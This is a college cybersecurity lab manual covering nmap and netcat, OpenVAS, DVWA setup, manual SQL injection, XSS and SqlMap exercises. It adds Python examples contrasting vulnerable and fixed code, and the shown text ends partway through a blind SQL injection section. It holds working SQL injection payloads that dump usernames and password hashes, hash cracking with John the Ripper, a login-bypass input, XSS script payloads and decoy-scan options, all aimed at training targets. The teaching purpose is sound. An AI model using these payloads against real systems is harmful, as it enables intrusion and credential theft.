
Government Engineering College, Rajkot
Instrumentation and Control Engineering Department
Rajkot

Subject: Cyber Security

LAB MANUAL
CERTIFICATE

This is to certify that Mr. / Ms. ____________________________________

Class ____________________ Enrollment No. _____________________

has satisfactorily completed his/her term work in

____________________________________________________________

for the term ending in 20 / 20 .

Date:- ______________________________________________________

Staff-in-charge _____________________________________

Head of Department _____________________________________

P a g e 2 | 96
INDEX

Sr. No.   Experiment Description                  Page No.   Date   Remarks   Faculty Sign
1         Basic Commands                           4
2         TCP scanning using NMAP                  23
3         Port scanning using NMAP                 34
4         TCP / UDP connectivity using Netcat      40
5         Network vulnerability using OpenVAS      46
6         Web application testing using DVWA       59
7         Manual SQL injection using DVWA          70
8         XSS using DVWA                           83
9         Automated SQL injection with SqlMap      86
Experiment 1
AIM: BASIC COMMANDS OF WINDOWS AND KALI LINUX

0.1 Basic Commands in Windows

1. ipconfig
Internet Protocol configuration (ipconfig) in Microsoft Windows is a console
application that displays all current TCP/IP network configuration values and can
modify Dynamic Host Configuration Protocol (DHCP) and Domain Name System
(DNS) settings.

2. ping
Ping is used to determine whether a connection exists between your computer and
another computer reachable over TCP/IP. It sends small packets of information to
the other computer, which are echoed back if the connection works and lost
otherwise. Ping is a useful utility for diagnosing network-related problems.
3. tracert
The tracert command is very similar to ping and is used to see the path a
network packet takes and the number of hops required for that packet to reach
its destination. It shows you exactly how far a packet gets before it fails, which
helps you judge whether a connection problem is close to you or nearer the
destination.

4. dir
Displays a list of files and subdirectories in a directory.
5. cd
Changes the current directory.

6. copy
Copies one or more files to another location.

7. del
Deletes one or more files.
8. xcopy
xcopy is a more powerful version of the copy command with additional features. It
has the ability to move files, directories and even whole drives from one
location to another. It can also preserve file attributes and long file names.

9. move
Moves files and renames files and directories.

10. mkdir
Creates a directory.
11. rmdir
Removes (deletes) a directory.

12. msinfo32
This command shows a complete summary of the system. It includes details
of Hardware Resources, Components and Software Environment.
13. dxdiag
DxDiag ("DirectX Diagnostics") is a diagnostics tool used to test DirectX
functionality and troubleshoot video- or sound-related hardware problems. DirectX
Diagnostic can save text files with the scan results. These files are often posted in
tech forums or attached to support emails to give support personnel a
better idea of the PC the requester is using, in case the error is due to a hardware
failure or incompatibility.
14. wmic os get osarchitecture
Reports whether the operating system is 32-bit or 64-bit; it is commonly used in
batch files to check the OS architecture and then run the appropriate executable.

15. wmic os get lastbootuptime
Gives the date and time at which the system was last booted.
systeminfo | find "System Boot Time"
Gives the last boot time in a more readable format.
16. gpresult /r
The Group Policy Results (GPResult.exe) command line tool reports all policy
settings in effect for a specific user or computer.
17. systeminfo
Displays detailed configuration information about a computer and its
operating system, including operating system configuration, security information,
product ID, and hardware properties such as RAM, disk space, and network cards.

18. net statistics
Displays the statistics log for the local Workstation or Server service, or the
running services for which statistics are available. Used without parameters, net
statistics lists the running services for which statistics are available.
0.2 Commands in Kali Linux

0.2.1 Operating System (OS)

1. id
Displays the identity (user and group IDs) of the user running the command.

2. uname -a
Displays the kernel name, hostname, kernel release, kernel version, machine
name, processor (if known), hardware platform (if known) and operating system.

3. lsb_release -a
Displays which version of Kali Linux is currently installed.

4. ifconfig
Displays various bits of information about the NICs (e.g. IP addresses,
subnet mask, MAC address etc.).

Note: ifconfig -a will display information about ALL NICs (including the ones
that are currently.
0.2.2 Networking

1. route -n
Displays the routing table (gateway information).

2. cat /etc/resolv.conf
Displays the DNS resolver configuration.

3. cat /etc/network/interfaces
Displays the network interface configuration.

4. cat /etc/hosts
Static values for hostname lookups.

Note: Editing these values will NOT change your hostname (for that look into
hostname & /etc/hostname).

0.2.3 Hardware

1. lspci
Lists all PCI devices (e.g. internal devices).
2. lsusb
Lists all USB devices (e.g. external devices).

3. dmesg
Displays the contents of the kernel ring buffer (what is in the kernel log).

Note: Warning, this may produce a very large output.

4. lsmod
Displays the status of modules in the Linux kernel (e.g. what drivers
have been loaded).
0.2.4 Wi-Fi

1. airmon-zc --verbose
A modified version of airmon-ng which helps with troubleshooting
and monitor mode.

2. rfkill
Enables (and disables) wireless devices.

3. iwconfig
Displays & controls 802.11 NICs.

4. airmon-ng
Automates putting wireless cards into monitor mode.
Experiment 2
AIM: TCP SCANNING USING NMAP

1.1 Why do we require nmap?

Hacking

Eric Raymond, compiler of "The New Hacker's Dictionary", defines
a hacker as a clever programmer. A "good hack" is a clever solution to a
programming problem and "hacking" is the act of doing it. Raymond
lists five possible characteristics that qualify one as a hacker, which we
summarize here:
● A person who enjoys learning the details of a programming
language or system.
● A person who enjoys actually doing the programming rather than just
theorizing about it.
● A person capable of appreciating someone else's hacking.
● A person who picks up programming quickly.
● A person who is an expert at a particular programming language or
system.

Types of Hackers
Hackers can be broadly classified on the basis of why they are
hacking a system or why they are indulging in hacking. There are
mainly three kinds of hackers on this basis:
● Black-Hat Hacker
Black hat hackers, or crackers, are people with extraordinary
computing skills who resort to malicious or destructive activities.
That is, black hat hackers use their knowledge and skill for their
own personal gain, usually by harming others.
● White-Hat Hacker
White hat hackers are people who possess hacker skills and
use them for defensive purposes. This means that white
hat hackers use their knowledge and expertise for the benefit of
other people and for the benefit of everyone.
● Gray-Hat Hackers
These are people who work both offensively and defensively at
different times. We cannot predict their conduct. Sometimes they
use their skills for the benefit of all, while at other
times they use them for personal gain.

Ethical Hacking
Ethical hacking and ethical hacker are terms used to describe hacking
performed by a company or individual to help identify potential threats
on a computer or network.

• An ethical hacker attempts to bypass system security and search for
any weak points that could be exploited by malicious hackers. This
information is then used by the organization to improve the system
security, in an effort to minimize or eliminate any potential attacks.
• Independent computer security professionals break into the
computer system.
• It will neither damage the target system nor steal information.
• The security of the target system is evaluated and any vulnerability
found is reported back to the owners.
• The purpose of ethical hacking is to evaluate the security of a
network or system's infrastructure. It entails finding and attempting
to exploit any vulnerabilities to determine whether unauthorized
access or other malicious activities are possible.

Required Skills of an Ethical Hacker:

• Certified Ethical Hacker (CEH)
• GIAC (Global Information Assurance Certification) Penetration Tester
(GPEN)
• Offensive Security Certified Professional (OSCP)
• Microsoft: skills in operation, configuration and management.
• Firewalls: configuration, and operation of intrusion detection systems.
• Routers: knowledge of routers, routing protocols, and access control lists.
• Network Protocols: TCP/IP; how they function and how they can be manipulated.

Methodology of Hacking

Hacking is gaining access to a computer or computer system without lawful
authorization. To hack any computer on a network it is necessary that the hacker's
computer is on the same network, or that some kind of interconnecting network
structure exists between them. This means that if your computer is not on any
network (i.e. standalone) then you are safe. Hacking is unlawful according to the
cyber law of every nation, so never attempt to be a hacker; but at least know the
outlines, so as to defend yourself.

There are mainly five steps in the hacking methodology, stated below:

1. Reconnaissance
2. Scanning & Enumeration
3. Gaining access
4. Maintaining access
5. Clearing tracks (Covering Tracks)

1) Reconnaissance

The term Reconnaissance (observation) refers to the first,
pre-attack phase of the hacking process: it includes information gathering
practices that aim to profile the target organization or network for
productive attack strategies.

In general, hacking-related surveillance activities are
carried out before a malicious attack for the following two
reasons: 1) to improve the likelihood of a successful operation against the
target, and 2) to improve the likelihood of successful anonymization (e.g.
concealing the attacker's identity).

2) Scanning & Enumeration

The second step of ethical hacking and penetration testing involves
two terms: scanning and enumeration.

Scanning is used for mass target assessment and identification of
listening services, focusing the attacker's attention on the
most promising avenues of entry.

Enumeration is used to identify valid user
accounts or poorly protected resource shares. It is the process of
extracting valid user accounts or exported resource names from
systems. These techniques are operating-system specific.

3) Gaining Access

This step uses the gathered data to make an informed attempt to access
the target.

The enumerated data is searched for default accounts,
misconfigured services or software. The packages installed are looked
up in vulnerability databases.

A Telnet session is then initiated to guess the password, or tools can be
employed for automated guessing. The exploited software is then used,
leading to access on the system.

4) Maintaining access

Once a hacker has gained access, they want to keep that
access for future exploitation and attacks. Sometimes, hackers
harden the system against other hackers or security personnel
by securing their exclusive access with backdoors, rootkits,
and Trojans. Once the hacker owns the system, they can
use it as a base to launch additional attacks. In this situation, the
owned system is sometimes referred to as a zombie system.

5) Clearing tracks (Covering Tracks)

To avoid getting traced and caught, the hacker clears all tracks by
clearing all kinds of logs and deleting the uploaded backdoor and
any related material which may later reveal his presence. Examples of
activities during this phase of the attack include steganography, the
use of tunnelling protocols, and altering log files.


Ethical hacking tools
Many tools have been developed for ethical hackers to evaluate security
levels. Here we describe some of the widely used tools in ethical hacking.
• Tools:

Sam Spade

Nmap

Nessus

MetaSploit

NetStumbler

Samspade

Sam Spade is the name of a Windows software tool designed to assist in
tracking down sources of e-mail spam. It is also the name of a free web
service that provides access to similar online tools. The Sam Spade utility
was authored by Steve Atkins in 1997. It is named after the fictional
character Sam Spade. The main features (query tools) are:

• Zone Transfer – ask a DNS server for all it knows about a domain.
• SMTP Relay Check – check whether a mail server allows third party
relaying.
• Scan Addresses – scan a range of IP addresses looking for open ports.
• Crawl website – search a website, looking for email addresses, offsite
links, etc.
• Browse web – browse the web in a raw http format.
• Check cancels – search your news server for cancel messages.
• Fast and Slow Traceroute – find the route packets take between you
and a remote system.
• S-Lang command – issue a scripting command; useful for debugging
scripts.
• Decode URL – decipher an obfuscated URL.
• Parse email headers – read email headers and make a guess about the
origin of the email.

Nmap

Nmap is one of the best tools used in the second phase of ethical
hacking, i.e. port scanning. Nmap was originally a command line tool
developed only for Unix/Linux based operating systems, but
now a Windows version is also available and easy to use. It is used for
operating system fingerprinting too.

For a quick and simple scan use:
• $ nmap 192.168.1.1

If you want to scan a whole network then you have to type the address with its subnet:
• $ nmap 192.168.1.1/24 or $ nmap 192.168.1.*

Use -O for operating system detection:
• $ nmap -O 192.168.1.1

Nmap Interesting options
• -f: fragments packets
• -D: launches decoy scans for concealment
• -I: IDENT scan – finds owners of processes (on Unix systems)
• -b: FTP bounce scan

Port Scan Types
• TCP Connect scan
• TCP SYN scan
• TCP FIN scan
• TCP Xmas Tree scan (FIN, URG, and PUSH)
• TCP Null scan
• TCP ACK scan
• UDP scan

Nessus

Nessus is the world's most famous vulnerability scanner. Nessus has
been developed by Tenable Network Security and is available free of cost
for non-enterprise environments, i.e. for home users. It is a network
vulnerability scanner used for finding the critical bugs on a system.

Automatic vulnerability scanning tools have great importance in the
field of penetration testing/ethical hacking; professionals use different tools
for different environments. Nessus can detect vulnerabilities like:

• Misconfigured or unpatched services.
• Default passwords and common passwords; in general, weak
passwords.
• Known vulnerabilities present on the system.

MetaSploit

The best tool ever: Metasploit contains a database with a list of
available exploits. It is easy to use and one of the best tools for doing penetration
testing. Metasploit Framework is a sub-project and is used to execute exploit
code against a machine and get the desired task done.

Metasploit is an open source (computer) security project that contains
information about vulnerabilities. If you put all the available exploits
in a single place, then you have the phenomenon of Metasploit.
A vulnerability is a weakness or a hole by which an attacker can
compromise a machine. An exploit is a piece of code, or an attack, that
takes advantage of a vulnerability. A payload is the piece of software that
lets you control a computer system after it has been exploited.
The Metasploit project provides Metasploit Pro, Metasploit Express and
Metasploit Framework. Metasploit Framework is open source and
available for free on cross-platform operating systems (Windows, Linux).

NetStumbler

NetStumbler, again a tool for wardriving, is available for Windows based
operating systems. It can detect Wi-Fi networks of the IEEE 802.11b, 802.11g
and 802.11a types. MiniStumbler is also available and works on Windows CE based
systems.
1.2 TCP Scanning using Nmap
Commands

nmap -sP 192.168.1.*

-sP: ping scan only (host discovery, no port scan)

nmap -T4 192.168.1.0/24

-T4: use timing template 4 (faster scanning)

nmap -sT 192.168.1.*

-sT: TCP connect scan

nmap -sU 192.168.1.*

-sU: UDP scan
Experiment 3
AIM: PORT SCANNING USING NMAP

2.1 Commands

nmap -sS -P0 -sV -O 192.168.1.0-255

-sS: perform a TCP SYN scan

-P0: skip host discovery and treat every host as online (the modern
spelling of this option is -Pn)

-sV: determine the version of the service running on each open port of the
target machine

-O: detect the operating system

nmap -sT -p80 192.168.1.*

-sT: TCP connect scan probe

-p80: scan only port 80

nmap -O 192.168.1.0

-O: detect the operating system

nmap -sF 192.168.1.0

-sF: TCP FIN scan; closed ports reply with RST while open or filtered ports
stay silent, so those ports are reported as open|filtered

nmap -sS 192.168.1.0/24 -D 192.168.1.44

-D: decoy scan; the SYN probes appear to come from the decoy host
192.168.1.44 as well as from the real source, which hides the scanner
among the decoys
Experiment 4
AIM: TCP / UDP CONNECTIVITY USING NETCAT

3.1 Basic Information

What is TCP?
• Transmission Control Protocol is the core protocol of the Internet Protocol Suite.
Commonly it is referred to as TCP/IP. TCP provides a reliable, ordered, error-
checked delivery service. TCP provides a connection-oriented service.

What is UDP?
• User Datagram Protocol. An application which does not require reliable
data transmission can use UDP. It provides a connectionless service.

What is Netcat?
• Netcat is a networking program designed to read and write data across
both Transmission Control Protocol (TCP) and User Datagram Protocol
(UDP) connections. It is used for:
• Port scanning
• File transfer
• Banner grabbing
• Port listening and redirection
• Netcat installation in Linux:
• Most Linux OSes come with Netcat installed.
• Type the command nc -h or netcat -h to check the version.
• If it is not installed:
• open a terminal
• type: apt-get install netcat
• type nc -h to confirm the installation

3.2 Commands

nc -h
• To get the help menu of Netcat
SSL BANNER GRABBING

HTTP BANNER GRABBING

HTTP BANNER GRABBING WITH AND WITHOUT NS

LISTENING SERVER ON PORT 12348

CONNECTING TO THE SERVER

• 192.168.106.128: SERVER IP ADDRESS
• 12348: PORT NO ON WHICH THE SERVER IS LISTENING

FINDING AN OPEN PORT BETWEEN 1-200

Creating a chat application

1) Start the server listening on port 12348

2) Connect to the server using the server's IP and port 12348
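As an added example (not part of the manual), the listener, the connecting client, the banner grab and the open-port search above can be reproduced with Python sockets; the same connect_scan function is what the TCP connect scan (-sT) of Experiments 2 and 3 does at the socket level. The banner text is constructed, and the listener uses an OS-chosen port rather than 12348 so that it runs anywhere.

```python
import socket
import threading

# Constructed sample banner: the greeting line a service sends on connect,
# which is exactly what "banner grabbing" with nc reads back.
SAMPLE_BANNER = b"220 example-service ready\r\n"


def start_banner_server(host="127.0.0.1", port=0):
    """Listener like `nc -l -p 12348`: greets each client with a banner and
    echoes one message back. port=0 lets the OS pick a free port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _addr = srv.accept()
            except OSError:
                return  # listening socket was closed: stop serving
            with conn:
                conn.settimeout(2.0)
                try:
                    conn.sendall(SAMPLE_BANNER)
                    data = conn.recv(1024)
                    if data:  # empty data means the peer closed
                        conn.sendall(b"echo: " + data)
                except OSError:
                    pass  # peer went away mid-exchange; serve the next one

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def grab_banner(host, port, timeout=2.0):
    """Client side of `nc host port`: connect, read whatever the service
    sends first, and return it."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return s.recv(1024)


def chat_once(host, port, message, timeout=2.0):
    """The two-ended chat of steps 1 and 2: connect, skip the banner,
    send one line and return the reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(1024)  # banner
        s.sendall(message)
        return s.recv(1024)


def connect_scan(host, ports, timeout=0.3):
    """Full TCP connect scan (what nmap -sT and the open-port search with
    netcat do): a completed three-way handshake means the port is open."""
    open_ports = []
    for p in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            if s.connect_ex((host, p)) == 0:
                open_ports.append(p)
        finally:
            s.close()
    return open_ports


def free_port(host="127.0.0.1"):
    """Bind to port 0 and release it: a port that is almost certainly closed,
    handy as a negative control for connect_scan."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, 0))
    p = s.getsockname()[1]
    s.close()
    return p


if __name__ == "__main__":
    srv, port = start_banner_server()
    print("listening on", port)
    print("banner:", grab_banner("127.0.0.1", port))
    print("reply :", chat_once("127.0.0.1", port, b"hello\n"))
    print("open  :", connect_scan("127.0.0.1", [port, free_port()]))
    srv.close()
```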
Experiment 5
AIM: NETWORK VULNERABILITY USING OPENVAS

4.1 Basic Information

What is OpenVAS?
• It is the world's most advanced open source vulnerability scanner and
manager.
• OpenVAS is a combination of several services and tools offering a
comprehensive and powerful vulnerability scanning and vulnerability
management solution.
• Collects and manages security information for networks, devices and systems.
• Uses a client-server architecture.
• The server keeps track of all the different vulnerability results.
• The scanner in OpenVAS collects the information.
• Built in to Kali Linux.

4.2 Network Vulnerability using OpenVAS

Step 1: How to start OpenVAS
Note: Do not log in while connected to the internet, because OpenVAS will then
update automatically and it may take a very long time.
a) Application -> Kali Linux -> Vulnerability Tools ->
OpenVAS -> OpenVAS start

b) Application -> Kali Linux -> Vulnerability Tools ->
OpenVAS -> OpenVAS initial setup
Step 2: Connecting to the OpenVAS Web Interface
a) Open your browser
b) Type https://127.0.0.1:9392
c) Click on I understand the risks
d) Confirm Security Exception
Step 3: OpenVAS Login Box

Step 4: Login
a) Username and password may be one of the following:

User name: admin & password: admin

User name: chintan & password: chintan

User name: admin & password: chintan

User name: student & password: student
Step 5: OpenVAS Security Assistant screen

Step 6: Update your Vulnerability Database Feeds

a) Administration -> NVT Feed -> Synchronize with Feed Now

b) Administration -> SCAP Database Feed -> Synchronize with
Feed Now

c) Administration -> Cert Feed -> Synchronize with Feed Now

Step 7: Add users (if required)
a) Administration -> Users
• If you want to add a user, delete a user or change user access

Step 8: Select Targets to Scan
a) Configuration -> Targets

b) Create new target

c) Click on Create Target Button

d) View the new target

Step 12: Create a Task
a) Scan Management -> New Task

b) Add a new task for the target we created in the previous step.

c) Click on Create Task Button

d) View new status of Task

e) After completion of scanning, you can download the complete report in
PDF format.
Experiment 6
AIM: WEB APPLICATION TESTING USING DVWA

5.1 Basic Information

What is Damn Vulnerable Web App (DVWA)?
• It is a PHP/MySQL web application which is, by design, damn vulnerable.
• The main goal of DVWA is to be an aid for security professionals to
test their skills and their tools in a legal environment.
• It helps web developers to better understand the process of securing web
applications, and lets teachers and students learn about web application
security in a classroom environment.
Important Note: DVWA should be installed on the attacker's device.

5.2 Steps to download open source DVWA from the network

Step 1: Download DVWA from http://sourceforge.net/projects/dvwa/

Step 2: Unzip the downloaded file with the command "unzip filename".

Step 3: Copy the dvwa folder into Computer → File system → var → www.

Step 4: Set the permissions of DVWA to 777; for this open a Terminal, type
"chmod 777 /var/www/dvwa" and press enter.

Step 5: a) Run Apache; for this go to Application → kali linux → System Service →
HTTP → apache2 start.
b) Apache runs successfully.

Step 6: a) Run MySQL; for this go to Application → kali linux → System Service
→ MySQL → mysql start.
b) MySQL runs successfully.

Step 7: Create the database for dvwa
a) Open a Terminal.
b) Type mysql -u root -p and press enter.
c) When it asks for a password, simply press enter.
d) Now type create database dvwa; and press enter.
e) If you want to exit, type exit and press enter.

Step 8: Go to your browser and open http://127.0.0.1/dvwa or http://localhost/dvwa

Step 9: Type your username and password; by default they are
username – admin
password – password
then click on Login.

Step 10: If you get the error "Table 'dvwa.users' doesn't exist",
then go to the URL http://127.0.0.1/dvwa/setup.php#
and click on Create/Reset Database.

Step 11: Again go to the URL http://127.0.0.1/dvwa/login.php

Step 12: Log on with the default username and password: username
= admin and password = password.
Experiment 7
AIM: MANUAL SQL INJECTION USING DVWA

6.1 Basic Information

What is SQL injection?
• SQL injection is a code injection technique usually used to attack
data-driven applications.
• A newly formed rogue SQL command is passed to the database through an
entry field of the website that is used to build SQL statements.
• The SQL injection technique exploits a security vulnerability in the
application software.
• SQL injection is mainly used as an attack vector against websites, but it can
attack any type of SQL database.
Important Note: DVWA should be installed on the attacker's device.

6.2 For Manual SQL Injection using DVWA

Step 1: The IP address of the victim's device should be known.
My victim's device IP address is 172.21.30.133
Step 2: Open your Kali Linux and check your IP address using the command
"ifconfig"
Step 3: Open your browser
Step 4: Type the below URL in your browser:
http://172.21.30.133/dvwa/login.php
Note: Here the victim's IP address is used.

Step 5: a) Login: admin
b) Password: password
c) Click on Login

Step 6: Click on DVWA Security in the left hand side menu.
a) Set "low"
b) Click Submit

Step 7: Click on SQL Injection in the left hand side menu.
a) Type 1 in the text box.
b) Click on Submit Button.

Step 8: Displaying all records: the first condition is false for every row and the
second condition is true for every row.
a) Type %' or '0'='0 in the text box.
b) Click on Submit Button.
Step 9: To know the version of the database, the following steps are followed:
a) Type %' or 0=0 union select null, version() # in the text box.
b) Click on Submit Button.

Step 10: To display the current database name, the following steps are followed:
a) Type %' or 0=0 union select null, database() # in the text box.
b) Click on Submit Button.

Step 11: To display all tables listed in information_schema, the following steps are
followed:
a) Type %' and 1=0 union select null, table_name from
information_schema.tables # in the text box.
b) Click on Submit Button.
Note: information_schema is the information database that stores information
about all the other databases that the MySQL server maintains.

Step 12: To display only the tables whose name starts with "user", the following
steps are followed:
a) Type %' and 1=0 union select null, table_name from
information_schema.tables where table_name like 'user%'#
b) Click on Submit Button.

Step 13: To display all the columns of the users table as recorded in
information_schema, the following steps are followed:
a) %' and 1=0 union select null, concat(table_name,0x0a,column_name)
from information_schema.columns where table_name = 'users' #
b) Click on Submit Button
Note: The columns will be user_id, first_name, last_name, user and password.

Step 14: To display all the contents of the users table, the following
command is used:
a) %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,
user,0x0a,password) from users #
b) Click on Submit Button.
Step 15: Now create a file whose content will be the usernames and hashed passwords.
a) To save the file, open a terminal and create a folder:
mkdir /root/Desktop/password
b) Copy all usernames and hashed passwords.
c) A text editor is required to paste the data; for that go to
Applications --> Accessories --> gedit

Step 16: Format for saving the usernames and passwords.

a) Add ":" after the username and press the delete key after ":" so
that the username and password are on one line, separated by ":".
b) Save the file in "/root/Desktop/password" as password.txt

Step 17: To run John the Ripper on password.txt and recover the original passwords
of the respective users, the following steps are followed:
a) You should be in your password folder where the password.txt file is
saved (i.e. cd Desktop/password and press enter).
(As my folder name is Jay and I have saved directly in root, I have done
cd Jay.)
b) Now type /usr/sbin/john --format=raw-MD5 password.txt
c) Press enter.
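As an added example, not the manual's or DVWA's own code, here is the query shape behind Steps 7, 8 and 14 (a DVWA "low"-style lookup that splices the submitted id into the SQL text) next to its parameterized fix, both run against a constructed in-memory SQLite copy of the users table; the probe function also reproduces the error that the single-quote input of Experiment 9's fuzzing step causes. The payloads are adapted to SQLite syntax, as noted in the comments.

```python
import hashlib
import sqlite3

# Constructed sample rows in the layout of DVWA's users table
# (user_id, first_name, last_name, user, password). Passwords are stored as
# raw MD5 hashes, which is why Step 17 runs john with --format=raw-MD5.
SAMPLE_USERS = [
    (1, "admin", "admin", "admin", "password"),
    (2, "Gordon", "Brown", "gordonb", "letmein"),
    (3, "Pablo", "Picasso", "pablo", "sunflower"),
]


def build_db():
    """In-memory SQLite stand-in for the dvwa database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
                 "last_name TEXT, user TEXT, password TEXT)")
    for uid, first, last, user, plain in SAMPLE_USERS:
        digest = hashlib.md5(plain.encode()).hexdigest()
        conn.execute("INSERT INTO users VALUES (?, ?, ?, ?, ?)",
                     (uid, first, last, user, digest))
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_id):
    """DVWA 'low' style: the submitted id is spliced into the query text, so
    a quote, OR or UNION inside the input becomes part of the SQL."""
    query = ("SELECT first_name, last_name FROM users "
             f"WHERE user_id = '{user_id}'")
    return conn.execute(query).fetchall()


def lookup_safe(conn, user_id):
    """Hardened form: a bound parameter is always data, never SQL, so the
    same inputs match nothing instead of rewriting the query."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_id,)).fetchall()


def probe(conn, user_id):
    """Classify one submission the way the fuzzing step of Experiment 9 does:
    a syntactically broken query raises an error, otherwise rows come back."""
    try:
        return ("rows", lookup_vulnerable(conn, user_id))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


# The manual's inputs, adapted to SQLite: '-- ' ends the line instead of
# MySQL's '#', and SQLite has no information_schema or concat(), so the
# Step 14 dump selects the two columns directly.
TAUTOLOGY = "%' or '0'='0"
DUMP_HASHES = "%' and 1=0 union select user, password from users -- "
SINGLE_QUOTE = "'"

if __name__ == "__main__":
    db = build_db()
    for payload in ("1", TAUTOLOGY, DUMP_HASHES, SINGLE_QUOTE):
        print(repr(payload), "->", probe(db, payload))
        print("   parameterized ->", lookup_safe(db, payload))
```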
Experiment 8
AIM: XSS

7.1 Basic Information
This practical will be performed in the Web Application module of Virtual Amrita
Laboratories Universalizing Education.

What is Cross Site Scripting (XSS)?
• Cross Site Scripting (XSS) is a type of computer security vulnerability
which is mainly found in web applications.
• It enables attackers to inject client-side script into web pages that are
accessed by other users.
• A user's input such as username, password, session ID etc. can later be
captured by an external script.
• The victim's browser does not recognize that the script is not trusted.
Instead it believes that the script comes from a trusted source and
executes it. A malicious script can access any cookies, session
tokens, or any other information retrieved through that browser and used
with that site.

Current scenario
• Mr. John is a web developer who creates twitter-like web applications. You
came across the website that he built and want to show him that his site is
vulnerable to XSS.

Details:
• Reflected XSS occurs when user-supplied values are not properly sanitized
before output. Here, in the example, go to the link provided and try to post a
tweet. You can see that the result is echoed back. Now what if we try to
inject something into the tweet box (say JavaScript)? If the input is not
properly validated we can get the injected script to run in the context of the
site. Let's see how it works:

• As a tweet, try to inject something like this:

I am tweet <Script> alert("XSS");</script>

You can see that we get a pop-up printing the word "XSS", which
means that the injected JavaScript ran in the context of the site and it is
vulnerable to XSS.

7.2 Practical

Step 1: Open your browser and type the following URL:
http://vlab.amrita.edu/?sub=85&brch=305
Step 2: Select concept 2: Basic XSS
Step 3: Choose simulator
Step 4: Type the given input in the textbox and click the Submit button.
<script>javascript:alert("This code execute");</script>
Step 5: Observe the output
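As an added example (not code from the manual or from the Amrita lab), a constructed stand-in for the tweet page shows the reflected echo that makes the practical above work, beside the output-encoding fix that stops it, with a small check that can be run over a rendered response.

```python
import html
import re

# Constructed stand-in for the tweet page: the submitted text is dropped
# into a paragraph of the response.
PAGE_TEMPLATE = '<html><body><p class="tweet">{}</p></body></html>'


def render_tweet_vulnerable(tweet):
    """Reflected XSS: the tweet is echoed back exactly as submitted, so any
    markup or script inside it becomes part of the page the browser parses."""
    return PAGE_TEMPLATE.format(tweet)


def render_tweet_safe(tweet):
    """Output encoding: html.escape turns <, >, &, " and ' into entities, so
    the browser shows the text literally instead of treating it as markup."""
    return PAGE_TEMPLATE.format(html.escape(tweet, quote=True))


# Case-insensitive check for a script tag opening anywhere in a response;
# usable as a unit test on templates or as a crude detector over captured
# responses (it catches the <Script> spelling used in the practical).
SCRIPT_OPEN = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_script_tag(page):
    return SCRIPT_OPEN.search(page) is not None


if __name__ == "__main__":
    payload = 'I am tweet <Script> alert("XSS");</script>'  # input from 7.1
    print(render_tweet_vulnerable(payload))
    print(render_tweet_safe(payload))
```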
Experiment 9
AIM: SQL INJECTION WITH SQLMAP

8.1 Basic Information

What is SqlMap?
• SqlMap is an open source penetration testing tool that automates the
process of detecting and exploiting SQL injection flaws and taking over
database servers. It comes with a kick-ass detection engine, many
niche features for the ultimate penetration tester and a broad range of
switches ranging from database fingerprinting, over data fetching from the
database, to accessing the underlying file system and executing
commands on the operating system via out-of-band connections.

Current Scenario
• Mr. Arun has created an awesome online shopping cart application. But he
forgot to do a security audit of the application and left it vulnerable to many
security issues. In this experiment, you will identify the spots or entry points
which are vulnerable to SQL injection attack.
• Find the search box, try entering a ' (tick) in the search box and observe the
output that you get.

Details:
When the student enters a ' (tick) into the text box, the search query executed
by the application in the backend gets modified. The modified query may
not be syntactically correct, leading the database management system to throw an error
back. The error messages are valuable tips to the attacker and can be used
to construct the injection input needed to get data which the attacker is not
authorized to access.

8.2 Practical

Step 1: Open your browser and type the following URL


http://vlab.amrita.edu/?sub=85&brch=305
Step 2: Select Concept 1: True or False SQL Injection Attack
Step 3: Select Simulator
Step 4: Choose page 2 and read the introduction
Step 5: After reading introduction choose page 3 and read the following instruction:

Fuzzing
Here you learn how to fuzz web applications, basically to find out whether a particular
web application is vulnerable or not. Fuzzing is a technique in which you
try various crafted inputs and observe the behavior of the application. In
this experiment you are going to practice a simple fuzzing technique which
makes the underlying database throw an error.
• You can see an online shopping cart application on the left of your screen;
enter a ' (tick) mark into the search box and observe the output.
• The online shopping cart application is using a MySQL database as its backend
to store data, and in order to access this data its underlying code executes
SQL queries. If the developers are not sanitizing the user input properly, for
example if the application is not checking the values that are being entered
into the search field, then the attacker will be able to modify the backend
query. When you enter a ' (tick), the backend query gets modified. The
injected ' (tick) makes the syntax of the backend query incorrect, thus
making MySQL throw an error.
Step 5: You will see a shopping cart web application

Step 6: Write ( ‘ ) on the textbox and click on search and observe the output.

Step 7: Select the given output, i.e. the text shown in Backend SQL Query, and paste it in the
textbox, then click Search and observe the output.

Step 8: This process will continue and give hints to write your query.
Step 9: Choose page 4 and follow the following instruction

True or False SQL injection attack

• If the database throws an error during fuzzing, then it means that the web
application is vulnerable to a True or False SQL injection attack. In this
experiment you are going to log in as admin without using a valid password.
• The shopping cart application that you can see to the left of the screen is
vulnerable to a True or False injection attack. First try fuzzing in the login
page and see if you are able to get an error.

• If yes, then try the following inputs and observe whether you are able to log in
as administrator.

a) Type username as: admin' or 1=1#


b) Click on Sign in

Step 10: Analyzing the original query with the modified query

a) Original Query: Select user from login where username=''
and password='';

b) Modified Query: select username from login where
username='admin' or 1=1# and password='password'
Step 11: Explanation of the above queries
In the above original SQL query, if the username and password entered are
authentic then the query returns true along with the username. Otherwise the query
returns false, which shows that the username and password don't match or
don't exist. But the modified query will always return True, as the condition
1=1 is always True. Two conditions can be combined using an OR operator: if
either of them is True then the whole expression is True. The # that follows
turns the rest of the line, including the password check, into a MySQL comment. This
will enable us to log in as administrator without a valid password.
Step 12: Choose page 5 and follow the instructions given below:

Blind SQL injection attack

• Blind SQL injection techniques are used when fuzzing doesn't yield any
error. So this requires a different kind of approach, in which you try to inject
